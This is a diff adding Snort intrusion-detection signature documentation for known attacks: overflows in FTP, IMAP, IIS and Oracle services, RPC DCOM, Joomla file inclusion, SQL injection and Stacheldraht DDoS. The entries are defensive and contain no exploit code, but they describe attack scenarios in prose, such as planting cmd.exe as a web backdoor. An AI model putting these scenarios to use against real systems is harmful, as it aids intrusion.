+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing HP-UX UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS358
+
+--
--- /dev/null
+++ b/doc/signatures/100000445.txt
@@ -0,0 +1,61 @@
+
+
+Rule:
+
+--
+Sid:
+100000445
+
+--
+Summary:
+Particle Gallery is susceptible to an injection attack due to a lack
+of input validation on the imageid variable used in the viewimage.php
+component.
+
+--
+Impact:
+The injection attack could result in data leakage, or potential remote
+compromise.
+
+--
+Detailed Information:
+Particle Gallery is prone to an SQL-injection vulnerability. This issue is due
+to a failure in the application to properly sanitize user-supplied input 
+before using it in an SQL query. 
+
+A successful exploit could allow an attacker to compromise the application,
+access or modify data, or exploit vulnerabilities in the underlying database
+implementation.
+
+The data type assigned to the column referenced by the variable is int, so
+there should never be any text or characters outside of the int used to
+identify the image.
+
+--
+Attack Scenarios:
+Variable manipulation can be done with any browser.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Edit code and add input validation.
+
+--
+Contributors:
+Dan Ramaswami <danr@sourcefire.com>
+
+-- 
+Additional References:
+
+-- 
--- /dev/null
+++ b/doc/signatures/1012.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1012
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1238.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1238
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1577.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1577
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/385.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+385
+
+--
+Summary:
+This event is generated when a Windows traceroute (tracert) is detected.
+
+--
+Impact:
+Information gathering.  A traceroute can be used to discover live hosts and network topologies.
+
+--
+Detailed Information:
+A Windows traceroute command uses an ICMP echo request with a lower than normal Time to Live (TTL) value to identify live hosts and network topolgies.  The TTL value is manipulated by the sending host to discover all routers traversed from the source host to the destination host.  Eventually, a TTL value of 1 is observed, which elicits an ICMP error message of time exceeded in-transit.  A router sends this ICMP error message to the host running traceroute.  The traceroute host will record this as a router and continue to incrementally manipulate the TTL until the destination host is reached. 
+
+Additionally There are at least three different implementations of 
+traceroute.  In one implementation traceroute works by sending an ICMP 
+Echo Request packet to a destination host with a TTL value of 1.  If the
+host is more than one hop away, the first route that receives the back 
+will send back an ICMP packet indicating that the TTL was exceeded.  The
+address of this router is then listed as the first hop.  The packet is 
+then sent out again with a TTL of 2.  This continues until the 
+destination host is able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may use a traceroute to discover live hosts and routers on a target network in preparation for an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The traceroute command may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS118
+
+--
--- /dev/null
+++ b/doc/signatures/1961.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1961
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rquotad is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rquotad is using.  Attackers can also learn what versions of the rquotad protocol are accepted by rquotad. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rquotad run.  The rquotad RPC service can be queried for user disk usage and the limits of a local file system which is mounted by a remote machine over NFS.  A vulnerability associated with rquotad may permit the execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rquotad runs.  This may be a precursor to accessing rquotad.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rquotad, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rquotad, not probes of the rquotad service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rquotad service itself. An attacker may attempt to go directly to the rquotad port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/227.txt
@@ -0,0 +1,56 @@
+Rule:
+--
+Sid:
+227
+
+--
+Summary:
+This event is generated when a Stacheldraht handler attempts to confirm that an agent has the ability to spoof a source IP.
+
+--
+Impact:
+Severe. This indicates that a Stacheldraht agent exists on the destination host. 
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  In order for an agent host to make a good participant in a distributed denial of service, it must be able to spoof source IPs to elude detection.  After a host becomes an agent, a test is conducted to see whether the agent can spoof a source IP.  If the handler receives such a communication from the agent, it responds with an ICMP echo request with an ICMP identification number of 1000 and a content of "spoofworks" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A host on which a Stacheldraht agent has been installed will attempt to send a packet with a spoofed source IP to the handler. If the handler receives this communication, it will reply to the agent informing it that all 32 bits of source IP of DDoS traffic can be spoofed. 
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Use egress filtering in your network to prevent traffic leaving your network that is not part of the internal address space so source IPs cannot be spoofed.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS192
+
+--
--- /dev/null
+++ b/doc/signatures/497.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 497
+
+-- 
+Summary: 
+This event is generated by the successful completion of a file transfer operation. This may be indicative of post-compromise behavior indicating the use of a Windows command shell for copying files.
+
+-- 
+Impact: 
+Serious. An attacker may have the ability to transfer files from the victim host.
+
+-- 
+Detailed Information: 
+This event indicates that a file was successfully copied using Windows command line shell.  The string "1 file(s) copied" is shown after the successful completion of a Windows "copy" command. 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has successfully executed the copy command. Note that the source address of this event is actually the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via an IIS vulnerability and then copies "cmd.exe" into the directory accessible by the web server, thus creating a backdoor to access the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Investigate the web server for other signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3270.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3270
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000463.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000463
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Joomla" application running on a webserver. 
+Access to the file "joomla.php" using a remote file being passed as the 
+"includepath" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "includepath" parameter in the "joomla.php" script used 
+by the "Joomla" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Joomla
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/372.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+372
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running Delphi software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Delphi software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS155
+
+--
--- /dev/null
+++ b/doc/signatures/3160.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3160
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1144.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1144
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3235.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3235
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1564.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1564
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2825.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2825
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2389.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2389
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd RNTO command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the RNTO command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the RNTO 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1857.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+1857
+--
+Summary:
+This event is generated when a client is requesting the file "robot.txt"
+from a web server.
+
+--
+Impact:
+Information Disclosure. This file may contain data that could provide an
+attacker with information that could assist in an attack on the server.
+
+--
+Detailed Information:
+In the early days of the web, when search engines first began indexing 
+sites, it was often desirable to tell the indexing programs, referred 
+to as robots, not to index certain parts of a site. A standarized 
+method of accomplishing this was created; by placing a file called 
+"robot.txt" or "robots.txt" in the root of your web site which search 
+engines could read and which would tell them what parts of your site you
+did not want indexed. However, this file can also be very valuable to 
+potential attackers if it contains information such as restricted 
+directories, cgi-bin locations, etc.
+
+--
+Affected Systems:
+Any web site that uses this method to communicate with robots.
+
+--
+Attack Scenarios:
+An attacker can read the "robot.txt" file and use any sensitive data in 
+it to profile your site in preparation for an attack.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Any browser can request a copy of 
+"robot.txt" from the server.
+
+--
+False Positives:
+Many. Most automated search engine indexing programs still request this 
+file prior to crawling through a web site.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure that your "robot.txt" file, if you need one, does not contain any
+sensitive data.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/297.txt
@@ -0,0 +1,59 @@
+SID:
+297
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1729.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1729
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/973.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+973
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with a .idc extension. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the victim server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports files extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request of a .idc file that causes a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
